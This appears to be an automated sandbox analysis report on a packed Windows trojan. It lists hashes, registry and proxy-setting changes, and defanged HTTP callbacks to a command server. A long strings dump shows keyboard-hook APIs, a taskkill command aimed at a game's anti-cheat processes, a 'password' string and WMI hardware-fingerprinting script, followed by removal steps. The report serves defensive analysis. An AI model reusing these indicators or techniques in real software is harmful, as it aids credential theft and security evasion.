MD5: e8adbe73e83c9497138bc931528d11fe
SHA1: 31f492885bbdc4afd89f78514213c3ad8dff8b0b
SHA256: cfc329a363315c0b5a12184e2b54247dd506ffdeecd538692d7f20473b5562f9
SSDeep: 12288:crJBYfmyVDgvFWpM8VjsRNAmi1yMEP/1SbryaRRIjRJjuyt7:cFj4DiFWp7wRemoyZ10VXgXZ
Size: 565252 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-05-13 07:20:02
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:2956

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\default[1].htm (914 bytes)
C:\swkss.ini (158 bytes)
C:\%original file name%.exe (565 bytes)

Registry activity

The process %original file name%.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\DNF\TerSafe.EXE]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\DNF\TerSafe.dll]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\e8adbe73e83c9497138bc931528d11fe_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??????_?
Product Name: ??????[??]
Product Version: 145.8.135.25
Legal Copyright: ???????????.
2008-2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 145.8.135.25
File Description: [????]@?[update]

Comments: [????]@?[update]
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://www.cmxzwl.com/kss_api/api.php?a=uplog&apiver=903&c=0&gdata=1&softcode=1000001&&x=430328	23.230.161.184
hxxp://www.cmxzwl.com/default.php	23.230.161.184

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /kss_api/api.php?a=uplog&apiver=903&c=0&gdata=1&softcode=1000001&&x=430328 HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0  (compatible; MSiE 6.0; Windows NT 5.1;)

Accept-Encoding: gzip, deflate

Host: VVV.cmxzwl.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sun, 13 Aug 2017 21:16:02 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.29

location: /default.php
0......


GET /default.php HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0  (compatible; MSiE 6.0; Windows NT 5.1;)

Accept-Encoding: gzip, deflate

Host: VVV.cmxzwl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 13 Aug 2017 21:16:02 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.3.29
392..<!doctype html>.<html lang="zh-cn">.<head>.<
meta charset="UTF-8">.<meta name="viewport" content="width=devic
e-width, initial-scale=1.0">.<title>.................._......
.................._..........................................</titl
e>.<meta name="Keywords" content="..................,...........
.............,..............................">.<meta name="Descr
iption" content=".....................................................
...............................,....................................,.
......................................................................
.................................................">.<style>.*
 {.        margin:0;.        padding:0;.}.</style>.</head>
.<body>.<script src="/base.js"></script>.<h1>.
................._........................_...........................
...............</h1>.<div style="display:none;">.<scrip
t src="/js.js"></script>.</div>.</body>.</html
>  ...0..HTTP/1.1 200 OK..Server: nginx..Date: Sun, 13 Aug 2017 21:
16:02 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connec
tion: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.3.29..392
..<!doctype html>.<html lang="zh-cn">.<head>.<met
a charset="UTF-8">.<meta name="viewport" content="width=device-w
idth, initial-scale=1.0">.<title>.................._.........
..............._..........................................</tit
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

`.rsrc

.drectve

.rdata

cmds

dllcmds

t%SVh

F SSh

N SSh

t$(SSh

|$D.tm

V SSh

~%UVW

kernel32.dll

advapi32.dll

ole32.dll

ntdll.dll

gdiplus.dll

user32.dll

shell32.dll

gdi32.dll

GdiPlus.dll

msimg32.dll

Gdiplus.dll

GetAsyncKeyState

MsgWaitForMultipleObjects

RegOpenKeyA

RegEnumKeyA

RegCloseKey

RegOpenKeyExA

ShellExecuteA

GdipSetPenLineJoin

GdipGetPenLineJoin

GdipSetStringFormatHotkeyPrefix

GdipGetStringFormatHotkeyPrefix

SOFTWARE\DNF\TerSafe.dll\

SOFTWARE\DNF\TerSafe.EXE\

taskkill /f /im DNF.exe.manifest

WINDOWS\svstem32\TesSafe.svs\

%System%%System%\cdplayer.exe.manifest

QQDL.exe

TXPlatform.exe

TenSafe.exe_1

TenSafe.exe_2

TenSafe.exe_3

Tencentdl.exe

TenSafe_1.exe

TenSafe_2.exe

TenSafe_3.exe

c:\swkss.ini

password

1970-1-1 00:00:01

MSXML2.XMLHTTP

Microsoft.XMLHTTP

Can't create XMLHTTP connection object

Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)

application/x-www-form-urlencoded

errmsg_s

\update.exe

x.yvr

x.yvkd

:|:czkey:|:

3.5 ---|

[WS2_32.DLL]

[wsock32.dll]

[wsock64.dll]

[WS2_64.DLL]

001A2B3C4D5Ec:\kss.ini

SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\

ServiceName\\.\

.rsrc

\.pL.

Windows

0,8999($

.SCK_LINES/9

.jJ^\

.ERZDLL$

%fLH^A

n.ef"

g%s_%d

=.Xh"

.Hjsp"

ANSI_CHARSE.Dc

O7E(AL("%s

KeywnF

.cu%t

\-ú

.NDFR8P

 Ix.Lv?h]#

keysK<

A.DHq*-

8X%Fx

L.@%u

.QunW

.da]o

.PP` 

.pas8

6.Pob

oOV?.DD@

.ChS-v

#yfP.re

KERNEL32.DLL

comctl32.dll

oleaut32.dll

version.dll

wsock32.dll

rsadll.dll

Function Getcpuid()

Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")

getcpuid=cpu.ProcessorId

end FunctionExecuteStatement

Getcpuid

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")

If mo.IPEnabled=True Then

MACAddress= mo.MacAddress

Microsoft Windows 95

Microsoft Windows 98

Microsoft Windows Millenium Edition

Microsoft Windows 2003

Microsoft Windows XP

Microsoft Windows 2000

Microsoft Windows NT 3.51

Microsoft Windows NT 4.0

Shlwapi.dll

@1970/1/1

R.DirectUI

?{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}

.text

h.rdata

H.edata

.vmp0

h.vmp1

h.reloc

[1]----]

CmxzwlWrRamSBTX.obj.sys

ntoskrnl.exe

right-curly-bracket

left-curly-bracket

iphlpapi.dll

WININET.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

MSVCP60.dll

%x.tmp

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

%d / %d

Bogus message code %d

(%d-%d):

%ld%c

1.1.3

;3 #>6.&

'2, / 0&7!4-)1#

glViewport

glTexEnvfv

glTexEnvf

\glu32.dll

\Opengl32.dll

glPassThrough

GetProcessHeap

WinExec

GetWindowsDirectoryA

RegCreateKeyA

GetViewportOrgEx

_acmdln

GetKeyState

`.rdata

@.data

]d1.sE

suDpNI

#include "l.chs\afxres.rc" // Standard components

ADVAPI32.dll

GDI32.dll

MFC42.DLL

MSVCRT.dll

OLEAUT32.dll

SHELL32.dll

USER32.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

3456789

(*.*)

145.8.135.25

2008-2014

%original file name%.exe_2956_rwx_00380000_00072000:

`.rsrc

kernel32.dll

Windows

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

USER32.DLL

oleaut32.dll

EVariantBadIndexError

ssShift

htKeyword

EInvalidOperation

u%CNu

%s_%d

EInvalidGraphicOperation

comctl32.dll

uxtheme.dll

MAPI32.DLL

!"#$%xi:

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState

OnKeyDown

OnKeyPressl

OnKeyUp

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

AutoHotkeys

TMainMenuDp;

TKeyEvent

TKeyPressEvent

HelpKeyword,

crSQLWait

%s (%s)

imm32.dll

readnowid.mtx

D:\ksreg_delphi\V9\_rsa_delphi_dll\UnitSock.pas

TBv}.Bv

333333333333333333

33333833

3333339

3333333333333338

:*"*"$3338

3333333

33333333

33333333333

3333333333338

33338?383

333333333333

:*3:"$3338

333333333333333

KWindows

UrlMon

GetCPInfo

RegOpenKeyExA

RegCloseKey

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MapVirtualKeyA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextA

EnumWindows

EnumThreadWindows

ActivateKeyboardLayout

GetKeyboardType

38000=344

.idata

.edata

P.reloc

P.rsrc

#yfP.re

KERNEL32.DLL

advapi32.dll

gdi32.dll

user32.dll

version.dll

wsock32.dll

rsadll.dll

No help keyword specified.

No help found for %s#No context-sensitive help installed$No topic-based help system installed

Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Unsupported clipboard format

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot open file "%s". %s

Invalid stream format$''%s'' is not a valid component name

Invalid property value List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

External exception %x

Interface not supported

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

I/O error %d

Integer overflow Invalid floating point operation

%original file name%.exe_2956_rwx_00401000_00220000:

.drectve

.rdata

dllcmds

t%SVh

F SSh

N SSh

t$(SSh

|$D.tm

V SSh

~%UVW

kernel32.dll

advapi32.dll

ole32.dll

ntdll.dll

gdiplus.dll

user32.dll

shell32.dll

gdi32.dll

GdiPlus.dll

msimg32.dll

Gdiplus.dll

GetAsyncKeyState

MsgWaitForMultipleObjects

RegOpenKeyA

RegEnumKeyA

RegCloseKey

RegOpenKeyExA

ShellExecuteA

GdipSetPenLineJoin

GdipGetPenLineJoin

GdipSetStringFormatHotkeyPrefix

GdipGetStringFormatHotkeyPrefix

SOFTWARE\DNF\TerSafe.dll\

SOFTWARE\DNF\TerSafe.EXE\

taskkill /f /im DNF.exe.manifest

WINDOWS\svstem32\TesSafe.svs\

%System%%System%\cdplayer.exe.manifest

QQDL.exe

TXPlatform.exe

TenSafe.exe_1

TenSafe.exe_2

TenSafe.exe_3

Tencentdl.exe

TenSafe_1.exe

TenSafe_2.exe

TenSafe_3.exe

c:\swkss.ini

password

1970-1-1 00:00:01

MSXML2.XMLHTTP

Microsoft.XMLHTTP

Can't create XMLHTTP connection object

Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)

application/x-www-form-urlencoded

errmsg_s

\update.exe

x.yvr

x.yvkd

:|:czkey:|:

3.5 ---|

[WS2_32.DLL]

[wsock32.dll]

[wsock64.dll]

[WS2_64.DLL]

001A2B3C4D5Ec:\kss.ini

SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\

ServiceName\\.\

.rsrc

\.pL.

Windows

0,8999($

.SCK_LINES/9

.jJ^\

.ERZDLL$

%fLH^A

n.ef"

g%s_%d

=.Xh"

.Hjsp"

ANSI_CHARSE.Dc

O7E(AL("%s

KeywnF

.cu%t

\-ú

.NDFR8P

 Ix.Lv?h]#

keysK<

A.DHq*-

8X%Fx

L.@%u

.QunW

.da]o

.PP` 

.pas8

6.Pob

oOV?.DD@

.ChS-v

#yfP.re

KERNEL32.DLL

comctl32.dll

oleaut32.dll

version.dll

wsock32.dll

rsadll.dll

Function Getcpuid()

Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")

getcpuid=cpu.ProcessorId

end FunctionExecuteStatement

Getcpuid

Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")

If mo.IPEnabled=True Then

MACAddress= mo.MacAddress

Microsoft Windows 95

Microsoft Windows 98

Microsoft Windows Millenium Edition

Microsoft Windows 2003

Microsoft Windows XP

Microsoft Windows 2000

Microsoft Windows NT 3.51

Microsoft Windows NT 4.0

Shlwapi.dll

@1970/1/1

R.DirectUI

?{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}

.text

h.rdata

H.edata

.vmp0

h.vmp1

h.reloc

[1]----]

CmxzwlWrRamSBTX.obj.sys

ntoskrnl.exe

right-curly-bracket

left-curly-bracket

iphlpapi.dll

WININET.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

MSVCP60.dll

%x.tmp

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

%d / %d

Bogus message code %d

(%d-%d):

%ld%c

1.1.3

;3 #>6.&

'2, / 0&7!4-)1#

glViewport

glTexEnvfv

glTexEnvf

\glu32.dll

\Opengl32.dll

glPassThrough

GetProcessHeap

WinExec

GetWindowsDirectoryA

RegCreateKeyA

GetViewportOrgEx

_acmdln

GetKeyState

`.rdata

@.data

]d1.sE

3456789

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\default[1].htm (914 bytes)
   C:\swkss.ini (158 bytes)
   C:\%original file name%.exe (565 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.